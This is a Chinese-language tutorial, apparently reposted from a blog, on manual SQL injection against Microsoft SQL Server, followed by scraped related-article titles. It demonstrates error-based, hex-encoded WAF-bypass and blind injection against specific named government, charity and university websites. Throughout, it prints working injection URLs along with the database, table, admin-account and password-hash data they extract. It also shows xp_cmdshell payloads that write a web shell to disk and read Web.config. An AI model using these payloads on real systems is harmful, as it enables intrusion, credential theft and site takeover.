例子:www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1

【1】首先爆版本:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0

原因:@@version是mssql 的全局变量,如果我们把它写成这样 and @@version>0 那个后面的mssql就会强行把@@version 强行转换成数字,但是失败,所以就会将数据库信息暴露出来

同样:通过

@@SERVERNAME:爆计算机名称

【2】:爆当前数据库名:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and db_name()>0

报错信息:在将 nvarchar 值 'kaifeng' 转换成数据类型 int 时失败。

【3】当前用户:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and User_Name()>0

报错信息:在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。

Ps:如果看到dbo 那么多半当前数据库的用户是dba权限

【4】爆其他数据库:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0

报错信息:在将 nvarchar 值 'master' 转换成数据类型 int 时失败。

再爆其他的数据库则这么写:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0

继续的话要这么写:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','kaifeng'))>0

【5】爆表则:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from [数据库名字].sys.all_objects where type='U' AND is_ms_shipped=0)>0

例子:

http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0)>0

报错信息:在将 nvarchar 值 'FRIENDLINK' 转换成数据类型 int 时失败。

再爆其他表:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK'))>0

在继续:

http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK','FRIENDLINK1'))>0

【6】爆字段则:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN')>0

例如:

http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN')>0

报错信息:在将 nvarchar 值 'ID' 转换成数据类型 int 时失败。

再爆其他字段:

http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID'))>0

再继续:

http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID','A_USERNAME'))>0

【7】爆数据:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 字段 from 数据库名.表名)>0

例子:

http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 A_PASSWORD from A_WEBADMIN)>0

报错信息:在将 nvarchar 值 'B5A1EF8730200F93E50F4F5DEBBCAC0B' 转换成数据类型 int 时失败。

如果数据的权限是dba,且知道网站路径的话,那么我们就可以用这个语句来写一句话小马进去:

asp木马:

http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1;exec master..xp_cmdshell 'echo ";''" > d:\KfSite\kaifeng\2.asp'--

aspx木马:

http://xxxxxxxx/adduser.aspx?username=1';exec master..xp_cmdshell 'echo ";''" >C:\inetpub\wwwroot\2.aspx' --

原理是sql server 支持堆叠查询,利用xp_cmdshell 可以执行cmd指令,cmd指令中用【echo 内容 > 文件】 可以写文件到磁盘里面

绕过waf防火墙的注入:

利用hex编码来绕过waf防火墙:

例子

http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi

利用hackbar 这个工具的Encoding 底下的HEX Encoding轻松把字符串编码成为可以利用的hex

然后利用报错注入就可以轻松完爆这个网站

【1】爆数据库版本:

select convert(int,@@version) hex编码后:0x73656c65637420636f6e7665727428696e742c404076657273696f6e29

然后我们这样注入:

http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)--

报错信息为:在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)

Apr 2 2010 15:48:46

Copyright (c) Microsoft Corporation

Standard Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1) (Hypervisor)

' 转换成数据类型 int 时失败。

【2】爆当前数据库

select convert(int,db_name()) hex 编码后:

0x73656c65637420636f6e7665727428696e742c64625f6e616d65282929

然后我们这样注入:

http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c64625f6e616d65282929 eXeC(@s)--

报错信息为:在将 nvarchar 值 'qds0240012_db' 转换成数据类型 int 时失败。

【3】爆用户:

select convert(int,User_Name())

hex编码后:

0x73656c65637420636f6e7665727428696e742c557365725f4e616d65282929

这样注入:

http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c557365725f4e616d65282929 eXeC(@s)--

报错信息:

在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。

【3】爆表:

select convert(int, (select top 1 name from qds0240012_db

.sys.all_objects where type='U' AND is_ms_shipped=0))

hex编码后:

0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d302929

我们这样注入:http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d302929 eXeC(@s)--

报错信息:在将 nvarchar 值 'CMS_ArticleClass' 转换成数据类型 int 时失败。

继续爆表:

select convert(int, (select top 1 name from qds0240012_db.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass')))

hex编码后:

0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c61737327292929

这样注入:

http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c61737327292929 eXeC(@s)--

报错信息为:

在将 nvarchar 值 'CMS_Career' 转换成数据类型 int 时失败。

继续

select convert(int, (select top 1 name from qds0240012_db.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass','CMS_Career')))

转换成hex:

0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c617373272c27434d535f43617265657227292929

这样注入:

http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c202873656c65637420746f702031206e616d652066726f6d20716473303234303031325f6462202e7379732e616c6c5f6f626a6563747320776865726520747970653d27552720414e442069735f6d735f736869707065643d3020616e64206e616d65206e6f7420696e202827434d535f41727469636c65436c617373272c27434d535f43617265657227292929 eXeC(@s)--

报错信息:

在将 nvarchar 值 'CMS_CareerClass' 转换成数据类型 int 时失败。

表为: 'CMS_ArticleClass','CMS_Career','CMS_CareerClass','CMS_Channel','CMS_Comment','Clz_Article','CMS_DrugsClass','CMS_Article','CMS_Fankui','CMS_Hospital','CMS_Message','CMS_Region_City','CMS_Topics','CMS_Region_District','CMS_Region_Province','CMS_SeekHelp','CMS_Sensitive','CMS_ShortMessage','CMS_TopicsClass','CMS_Drugs','CMS_Transaction','CMS_HospitalClass','CMS_Type','CMS_UserGroup','CJ_BianMa','CJ_GuiZe','CJ_IsDown','CJ_Item','CJ_LanMu','CJ_News','CJ_Pic','CJ_Site','Clz_Article_img','CMS_Userinfo','Clz_Channel','Clz_Column','Clz_Comment','Clz_Content','Clz_Image','Clz_Link','Clz_LinkCate','Clz_Model','Clz_Notice','Clz_Product','Clz_Solicitate','Clz_UserHome','CMS_Admin','CMS_AdminGroup','Clz_Video','Clz_WebSite','D99_Tmp','dtproperties','FeedBack','pangolin_test_table','syscommand','UserSign','vw_Channel','vw_Column','xiaolu','zzq_AD_AD','zzq_AD_Class'

【4】爆字段:

select convert(int,(select top 1 COLUMN_NAME from qds0240012_db.information_schema.columns where TABLE_NAME='CMS_Userinfo'))

hex编码:

0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f272929

这样注入:

http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f272929 eXeC(@s)--

报错信息:

在将 nvarchar 值 'id' 转换成数据类型 int 时失败。

继续:

select convert(int,(select top 1 COLUMN_NAME from qds0240012_db.information_schema.columns where TABLE_NAME='CMS_Userinfo' and COLUMN_NAME not in ('id')))

hex编码:

0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e202827696427292929

这样注入:

http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e202827696427292929 eXeC(@s)--

报错信息:

在将 nvarchar 值 'username' 转换成数据类型 int 时失败。

在继续:

select convert(int,(select top 1 COLUMN_NAME from qds0240012_db.information_schema.columns where TABLE_NAME='CMS_Userinfo' and COLUMN_NAME not in ('id','username')))

hex编码:

0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e2028276964272c27757365726e616d6527292929

这样注入:

http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120434f4c554d4e5f4e414d452066726f6d20716473303234303031325f64622e696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265205441424c455f4e414d453d27434d535f55736572696e666f2720616e6420434f4c554d4e5f4e414d45206e6f7420696e2028276964272c27757365726e616d6527292929 eXeC(@s)--

报错信息:

在将 nvarchar 值 'nickname' 转换成数据类型 int 时失败。

CMS_Userinfo 字段:

'id','username','nickname','password','realname','problem','answer','gender','age','adminid','groupid','regip','joindate','lastip','lastvisitdate','digestposts','pageviews','popular','unwelcome','credits','extcredits1','extcredits2','extcredits3','extcredits4','extcredits5','extcredits6','extcredits7','extcredits8','avatar','email','onlinestate','onlineDate','vip','isalliance','status','phone','mobile','qq','msn','address','postcode','sitename','siteIntroduction','website','sitetype','income','expenditure','funds','birthday','province','district','city','logincount','integral','gold','top','headlines','recommend','audit','orderid','healthlevel','professional','post','isdelete','deletestaff','datetime','code','edu','national','remark','photo','usertype','yuyan','fuwuneirong','fuwushijian'

CMS_Admin字段:

'id','username','password','realname','lastloginip','lastlogintime','logincount','allowmultilogin','groupid','groupname'

【5】爆数据:

select convert(int,(select top 1 username from CMS_Admin))

hex编码:

0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120757365726e616d652066726f6d20434d535f41646d696e2929

这样注入:

http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f70203120757365726e616d652066726f6d20434d535f41646d696e2929 eXeC(@s)--

报错信息:

在将 nvarchar 值 'admin' 转换成数据类型 int 时失败。

继续,爆密码

select convert(int,(select top 1 password from CMS_Admin))

hex编码:

0x73656c65637420636f6e7665727428696e742c2873656c65637420746f7020312070617373776f72642066726f6d20434d535f41646d696e2929

这样注入:

http://www.ikcw.com/jiuzhu/qiuzhuzhe.aspx?username=niuxinyi'; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c2873656c65637420746f7020312070617373776f72642066726f6d20434d535f41646d696e2929 eXeC(@s)--

报错信息:

在将 nvarchar 值 'sOKhmQxCdfzQy8GPXSskPPIV73jEtf0xvNlvUT3LfsoWe6Cw4ZnsqSlsaYhkMJCR' 转换成数据类型 int 时失败。

盲注:

例子:

http://wenfa.nchu.edu.cn/md.aspx?t=0&c=c1

先说一些函数的说明:

substring(str,start,len) 截取字符串的作用,第一个参数为要截取的字符串,第二个参数为从哪里开始截取,第三个参数为截取的长度

ascii(char) 把字符转换为ascii值

【1】爆数据库版本:

wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))>0/**/--&t=0

正常页面

wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))>100/**/--&t=0

不正常页面

说明@@version的第一个字母的ascii 的范围是在0到100 之间

wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))=77/**/--&t=0

正常页面,说明@@version的第一个字母的ascii 的值是77,查表可知为M

第二个字母的注入为:

wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,2,1))>0/**/--&t=0

方法相同

【2】爆当前数据库名字

wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(db_name(),1,1))>200/**/--&t=0

ascii大于140发现页面正常,则当前的数据库的名字为中文,则换成这样注入:wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/unicode(substring(db_name(),1,1))>200/**/--&t=0

最后发现:

wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/unicode(substring(db_name(),1,1))=25991/**/--&t=0

在http://www.bangnishouji.com/tools/chtounicode.html查询

文 转换成中文,就是“文”字

最后注入发现当前数据库的为:文法学院

【3】爆表

wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1 name/**/from/**/文法学院.sys.all_objects where type='U'/**/AND/**/is_ms_shipped=0),1,1))>0/**/--&t=0

爆第二张表:

wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/name/**/from/**/文法学院.sys.all_objects where type='U'/**/AND/**/is_ms_shipped=0 and name not in('Tb_SysUser')),1,1))>0/**/--&t=0

【4】爆Tb_SysUser 表的字段:

wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/ 1/**/COLUMN_NAME from/**/文法学院.information_schema.columns/**/where/**/TABLE_NAME='Tb_SysUser'),1,1))>0/**/--&t=0

爆第二个字段:

wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/ 1/**/COLUMN_NAME/**/ from/**/文法学院.information_schema.columns/**/where/**/TABLE_NAME='Tb_SysUser'/**/and/**/COLUMN_NAME/**/not/**/in('fPwd')),1,1))>0/**/--&t=0

【5】爆数据

wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/fPwd/**/from/**/Tb_SysUser),1,1))>0/**/--&t=0

来源:https://blog.csdn.net/niexinming/article/details/49055609

--判断表是否存在,存在删除,创建表,执行命令,回显

if exists (select * from sys.objects where name = 'temp2'and type = 'U')

drop table temp2;--删除

create table temp2([output] varchar(1000));--创建

insert temp2 exec master.dbo.xp_cmdshell 'type F:\Web.config';--读取文件

select convert(int,(select * from temp2 FOR XML PATH('')));--显示文件

mysql dba盲注_MSSQL手工注入 报错注入方法相关推荐

  1. SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用

    Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...

  2. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

    第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

  3. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

    第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

  4. SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注

    第26关是单引号字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...

  5. SQLi Labs Less-1 联合注入+报错注入

    第一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解,原理+步骤+实战案例 第一步.判断注入点 地址栏输入:?id=1' and 1 -- a,正常显示 ...

  6. SQLi LABS Less 23 联合注入+报错注入+布尔盲注

    第23关是单引号字符型注入: 过滤了注释,使用闭合引号来绕过: 这篇文章提供联合注入.报错注入.布尔盲注三种解题方式. 一.功能分析 这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据 ...

  7. mysql less6教程_Sqli labs系列-less-56 报错注入法(上)

    睡了一下午,晚上也没啥事,还特别精神,就想着,要不继续做做这个系列第五关和第六关吧,在我一系列常规的测试后发现,第五关和第六关,是属于报错注入的关卡,两关的区别是一个是单引号一个是双引号...当然我是 ...

  8. SQLi LABS Less-11 联合注入+报错注入

    第十一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入: a' or 1 -- a 密码随便输入: ...

  9. SQLi-LABS Less-2,联合注入+报错注入

    第二关注入点为数值型注入 , 推荐使用联合注入.报错注入. 方式一:联合注入 参考文章:联合注入使用详解,原理+步骤+实战案例 第一步.判断注入点 地址栏输入 ?id=1 and false -- a ...

最新文章

  1. 阿里巴巴电商搜索推荐实时数仓演进之路
  2. 继穿越火线后的又一传奇:Final Approach
  3. tomcat端口占用后的解决办法
  4. 《统计自然语言处理》读书笔记 一.基础知识及概念介绍
  5. Image flow使用
  6. Intouch和S7300连接 DAServer分组 SMC驱动备份
  7. Vue+Electron下Vuex的Dispatch没有效果的解决方案
  8. 我的世界java232位_我的世界32位红石电脑RSC-3230(无命令方块)(2)
  9. 阶乘的java编程_java编程求n的阶乘
  10. 机器学习及深度学习相关资料汇总
  11. Anaconda安装Pyserial
  12. 2020年下半年信息安全工程师下午真题及答案解析
  13. Barefoot Networks 宣布 P4 Studio—下一代软件开发环境
  14. C语言基础---3.格式化输出总结---%d ,%s,%f %.3f,%m.ns 以及sprintf函数
  15. 大数乘法(快速傅立叶变换)上
  16. 常用ACM知识点清单(未完待续)
  17. css3论坛,css3学习参考手册
  18. 公共WIFI上网短信认证解决方案
  19. iOS___oc app中接入支付宝详细流程
  20. web课程设计网页规划与设计 基于HTML+CSS+JavaScript制作智能停车系统公司网站静态模板

热门文章

  1. 网站域名需要实名认证吗 域名实名和域名备案是一样的吗
  2. 几种对象实例化方式详解
  3. linux删除中文名文件,linux运维 - linux下 怎样删除文件名中包含特殊字符的文件...
  4. 计算机重启一直显示正在准备,电脑一直显示正在准备windows怎么办 为什么我的电脑重启后一直显示正在准备windows - 云骑士一键重装系统...
  5. php名片自动生成,利用PHP自动生成印有用户信息的名片
  6. matlab钢琴键位do编程,按下钢琴一个键,程序如何识别出是哪个键
  7. Linux系统实战部署私有云网盘
  8. python 可视化图表 联动_Vue2+Echarts实现多种图表数据可视化Dashboard详解(附源码)...
  9. java:按钮(默认按钮)
  10. 常见的网站样式模板,网站设计助手